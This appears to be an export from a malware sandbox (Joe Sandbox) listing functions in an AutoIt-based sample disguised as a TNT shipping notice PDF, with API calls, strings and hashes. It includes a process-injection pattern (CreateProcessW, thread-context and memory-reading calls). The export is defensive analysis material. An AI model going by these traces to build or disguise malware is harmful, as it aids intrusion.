Function 008C2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008C2D07
RegisterClassExW.USER32(00000030), ref: 008C2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C2D42
InitCommonControlsEx.COMCTL32(?), ref: 008C2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C2D6F
LoadIconW.USER32(000000A9), ref: 008C2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C2D94

Strings

+, xrefs: 008C2CF0
0, xrefs: 008C2CE9
AutoIt v3 GUI, xrefs: 008C2D23
TaskbarCreated, xrefs: 008C2D37

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 30f12468836f505d8d5bbd0be9e9935fde72fc3c120ad51db6cc6a7e0ec00e23
Instruction ID: 966a92927e77a3976a20dc78c46d1c559655640422f9a3c96af660f4ec7a1b14
Opcode Fuzzy Hash: 30f12468836f505d8d5bbd0be9e9935fde72fc3c120ad51db6cc6a7e0ec00e23
Instruction Fuzzy Hash: 7221F4B5925309EFDB00DFA9EC49BDDBBB4FB08702F00411AF911A62A0D7B10544EF90

Function 0090065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0090039A: CreateFileW.KERNELBASE(00000000,00000000,?,00900704,?,?,00000000,?,00900704,00000000,0000000C), ref: 009003B7

GetLastError.KERNEL32 ref: 0090076F
__dosmaperr.LIBCMT ref: 00900776
GetFileType.KERNELBASE(00000000), ref: 00900782
GetLastError.KERNEL32 ref: 0090078C
__dosmaperr.LIBCMT ref: 00900795
CloseHandle.KERNEL32(00000000), ref: 009007B5
CloseHandle.KERNEL32(?), ref: 009008FF
GetLastError.KERNEL32 ref: 00900931
__dosmaperr.LIBCMT ref: 00900938

Strings

H, xrefs: 009008BD

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 9bbe8e3d25584538de6aabc1fef9957335b72840b5267b7dbb815cce1384fc03
Instruction ID: 57c3e821b95a58e69d82a332fff18060ae293987edb35dadfd6f273e526c2b8f
Opcode Fuzzy Hash: 9bbe8e3d25584538de6aabc1fef9957335b72840b5267b7dbb815cce1384fc03
Instruction Fuzzy Hash: 7DA14732A141488FDF19AF68DC51BAE3BA4EB8A320F140159F815DB2D2D7359D12DB92

Function 008C344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008C3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00991418,?,008C2E7F,?,?,?,00000000), ref: 008C3A78

Part of subcall function 008C3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008C3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008C356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0090318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 009031CE
RegCloseKey.ADVAPI32(?), ref: 00903210
_wcslen.LIBCMT ref: 00903277
_wcslen.LIBCMT ref: 00903286

Strings

\, xrefs: 0090328C
\Include\, xrefs: 008C3527
Software\AutoIt v3\AutoIt, xrefs: 008C3560
Include, xrefs: 00903184, 009031C5

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: b12ed178517885adcc84a94954a55396309c42daf969fe14939f38b30c7e928b
Instruction ID: 735e9d375a14692324fe64e867366818a740d57fd6e876a19b3ec30ac4fc063d
Opcode Fuzzy Hash: b12ed178517885adcc84a94954a55396309c42daf969fe14939f38b30c7e928b
Instruction Fuzzy Hash: A5715971419300AEC714EF2DEC829AABBF8FF95B40B40492EF555C71A1EB319A48DB52

Function 008C2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 008C2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 008C2B9D
LoadIconW.USER32(00000063), ref: 008C2BB3
LoadIconW.USER32(000000A4), ref: 008C2BC5
LoadIconW.USER32(000000A2), ref: 008C2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008C2BEF
RegisterClassExW.USER32(?), ref: 008C2C40

Part of subcall function 008C2CD4: GetSysColorBrush.USER32(0000000F), ref: 008C2D07
Part of subcall function 008C2CD4: RegisterClassExW.USER32(00000030), ref: 008C2D31
Part of subcall function 008C2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008C2D42
Part of subcall function 008C2CD4: InitCommonControlsEx.COMCTL32(?), ref: 008C2D5F
Part of subcall function 008C2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008C2D6F
Part of subcall function 008C2CD4: LoadIconW.USER32(000000A9), ref: 008C2D85
Part of subcall function 008C2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008C2D94

Strings

AutoIt v3, xrefs: 008C2C2F
#, xrefs: 008C2C16
0, xrefs: 008C2C0F

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 3f74796f7b82a48db0e374033655a6a114b2a3cd39c8cb1bb4b8a3e330722e25
Instruction ID: cebe01aafda7e4c83512713534204f889f02deca7e5d6928d12bae3a7c4e194c
Opcode Fuzzy Hash: 3f74796f7b82a48db0e374033655a6a114b2a3cd39c8cb1bb4b8a3e330722e25
Instruction Fuzzy Hash: 01213EB0E28315AFDB109FAAEC56B9D7FB4FB48B51F04411BF504A66A0D7B14540EF90

Function 008C3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,008C316A,?,?), ref: 008C31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,008C316A,?,?), ref: 008C3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008C3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,008C316A,?,?), ref: 008C3232
CreatePopupMenu.USER32 ref: 008C3246
PostQuitMessage.USER32(00000000), ref: 008C3267

Strings

TaskbarCreated, xrefs: 008C322D

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d712e3e36e5fd1e937ea7ccb3ebd55a0c8be1e7eead53613520a2da2c069ed81
Instruction ID: 2e9fa97d3a132bf14b72718c4b144c38a6dbd286a95ef8ad6d2ea7257dbced9b
Opcode Fuzzy Hash: d712e3e36e5fd1e937ea7ccb3ebd55a0c8be1e7eead53613520a2da2c069ed81
Instruction Fuzzy Hash: C941C431268305AEDF251B6C9D0EFB93A79F749346F08812FF502C56A1C771CE42AB62

Function 008F8D45 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6975f304ca9bc936f3a260e87b1e103f16295331e3eb2c1f60e8f47aa567deb
Instruction ID: 3d961ddb2a1d33a200d068e591410a68b35dd5826a161629d75eff5dc77ad541
Opcode Fuzzy Hash: c6975f304ca9bc936f3a260e87b1e103f16295331e3eb2c1f60e8f47aa567deb
Instruction Fuzzy Hash: FFC1BC75A0824DAFCB119FBDD841BBDBBB0FF9A310F144099EA54E7292CB319941CB61

Function 008B2620 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 008B26F1
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008B2917

Memory Dump Source

Source File: 00000000.00000002.1371455675.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction ID: b3c48584832886c8d1ccaf10ed8e5382760c7b5b14193ca3f4e77368f8980ea0
Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
Instruction Fuzzy Hash: 7EA10674E00209EBDB14CFA4C894BEEBBB5FF48304F208569E511BB390D7759A81DB95

Function 008C2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 008C2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 008C2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,008C1CAD,?), ref: 008C2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,008C1CAD,?), ref: 008C2CCF

Strings

AutoIt v3, xrefs: 008C2C89, 008C2C8E, 008C2C8F
edit, xrefs: 008C2CAC

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 64d448158bc37bf7103513b4221389232b7b99dd479b132cfc9327f49d29dd44
Instruction ID: d7223db3f433b5076d74c508871f52f2e59043e1e7c41bf3b4c390c24d88406b
Opcode Fuzzy Hash: 64d448158bc37bf7103513b4221389232b7b99dd479b132cfc9327f49d29dd44
Instruction Fuzzy Hash: 26F0DAB55643917EEB31572BAC0AE772EBDE7CAF51B00005BF904A25A0C6711854EAB0

Function 008B23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 159
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008B22A0: Sleep.KERNELBASE(000001F4), ref: 008B22B1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 008B250E

Strings

KLWRREF0XGZZ23IA6J15BP9UV5DT3, xrefs: 008B2574, 008B2577

Memory Dump Source

Source File: 00000000.00000002.1371455675.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CreateFileSleep
String ID: KLWRREF0XGZZ23IA6J15BP9UV5DT3
API String ID: 2694422964-933047734
Opcode ID: 77a8b5b27aea246317adacd00709b1b0db1136697fae5b6ed398d259f6ae57b8
Instruction ID: a35173b5e961f873c8284d5713e12b1f513eb097c8f04f4ae7bee23bc33cfdd3
Opcode Fuzzy Hash: 77a8b5b27aea246317adacd00709b1b0db1136697fae5b6ed398d259f6ae57b8
Instruction Fuzzy Hash: 67616330D0428CDAEF11DBA8C854BDFBB75AF15304F044199E649BB2C1D7B90B49CBA6

Function 00932947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00932C05
DeleteFileW.KERNEL32(?), ref: 00932C87
CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00932C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00932CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00932CC0

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 428461df7a8b161c4c81895c2c15a1b9b8e7bbeff828263e1302ba8b0e109f61
Instruction ID: d58cabff6d32ad9f4f3c2ba5645182bf845771e0dd9ff84e6db467b16334fdcb
Opcode Fuzzy Hash: 428461df7a8b161c4c81895c2c15a1b9b8e7bbeff828263e1302ba8b0e109f61
Instruction Fuzzy Hash: 1DB13D71D00219ABDF25DBA9CC85EDEB7BDFF49350F1040A6F609E6151EA30AA448F61

Function 008C10F3 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 008C1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008C1BF4
Part of subcall function 008C1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 008C1BFC
Part of subcall function 008C1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008C1C07
Part of subcall function 008C1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008C1C12
Part of subcall function 008C1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 008C1C1A
Part of subcall function 008C1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 008C1C22

Part of subcall function 008C1B4A: RegisterWindowMessageW.USER32(00000004,?,008C12C4), ref: 008C1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008C136A
OleInitialize.OLE32 ref: 008C1388
CloseHandle.KERNEL32(00000000,00000000), ref: 009024AB

Strings

pV, xrefs: 008C116A

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: pV
API String ID: 1986988660-2779098487
Opcode ID: 122d3b453379b399957a66d38fc0117eef80de41b0fa8cdcc6123c8333955839
Instruction ID: 494582615b0d83509501c2ce2d31aa65cef5986588561b5e9046df5ccd810b1d
Opcode Fuzzy Hash: 122d3b453379b399957a66d38fc0117eef80de41b0fa8cdcc6123c8333955839
Instruction Fuzzy Hash: 7A71DDB49293028FCB84DF7EA945A553BE4FB88344746812FE41AC7371EB308445EF52

Function 008C3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,008C3B0F,SwapMouseButtons,00000004,?), ref: 008C3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,008C3B0F,SwapMouseButtons,00000004,?), ref: 008C3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,008C3B0F,SwapMouseButtons,00000004,?), ref: 008C3B83

Strings

Control Panel\Mouse, xrefs: 008C3B3E

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: a1f9e0273b31aac278f1ed47ec774e0e9b5897e563ce8f1622505ca98abaa4f4
Instruction ID: c506cad9562124805ba8501127d074cc52f0d0e38bbb0ceba2e316c0788113bb
Opcode Fuzzy Hash: a1f9e0273b31aac278f1ed47ec774e0e9b5897e563ce8f1622505ca98abaa4f4
Instruction Fuzzy Hash: 6C1118B5520308FEDB208FA5DC44EAEB7B8EF05765B108459A805D7110D231DE41AB60

Function 008B12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 008B1A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 008B1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 008B1B13

Memory Dump Source

Source File: 00000000.00000002.1371455675.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8b0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction ID: 11afa3440ab609780b71891cbdaa2f8cc7d6a5de81c934905e3b68afdc5cae83
Opcode Fuzzy Hash: e235fc09ec9bfc9c0206b74767dc68ebb1ba0de80392d7b4ec5f78f608a2290d
Instruction Fuzzy Hash: F7620830A14258DAEB24CFA4C855BDEB372FF58700F5091A9E10DEB390E7799E81CB59

Function 008CDFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 009132B7

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: eb896d104cb81a84c8531b2d9410b4ebe8c317d2fd598b9c8aed5f3f764a0869
Instruction ID: 8f03cb53b72916330e133a69fbc66f92e6ccc1414f1cbc94480c7b46e7cef827
Opcode Fuzzy Hash: eb896d104cb81a84c8531b2d9410b4ebe8c317d2fd598b9c8aed5f3f764a0869
Instruction Fuzzy Hash: 11C25771A002189FCB24CF68C881FADB7B5FB18314F24856AE956EB391D375ED81CB91

Function 008C3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009033A2

Part of subcall function 008C6B57: _wcslen.LIBCMT ref: 008C6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C3A04

Strings

Line: , xrefs: 009033EB

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 255606851249c17489ac1dc3697f2c415244dc0ccf4061364c3271d576d81cf9
Instruction ID: 5743f7ff00d8c0a096fd18621c06942301377623324bf07d5c0d3c72dbb45fe3
Opcode Fuzzy Hash: 255606851249c17489ac1dc3697f2c415244dc0ccf4061364c3271d576d81cf9
Instruction Fuzzy Hash: F9318971418305AAD725EB28D846FEAB7B8FB41714F008A2EF599D2191EB709A49C783

Function 008DFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 008E0668

Part of subcall function 008E32A4: RaiseException.KERNEL32(?,?,?,008E068A,?,00991444,?,?,?,?,?,?,008E068A,008C1129,00988738,008C1129), ref: 008E3304

__CxxThrowException@8.LIBVCRUNTIME ref: 008E0685

Strings

Unknown exception, xrefs: 008E0692

Memory Dump Source

Source File: 00000000.00000002.1371488122.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.1371473097.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.000000000095C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371542971.0000000000982000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371589581.000000000098C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1371609606.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_TNT Express Arrival Notice AWB 8013580 1182023_PDF_.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 7ee8a76061d83c9f5e93714059d00282337306224ac303d8a44f65b4d423b447
Instruction ID: aec8f94e40d0bedcbc11aa461416c4705955b4f215438dffb85f3f263fe01bab
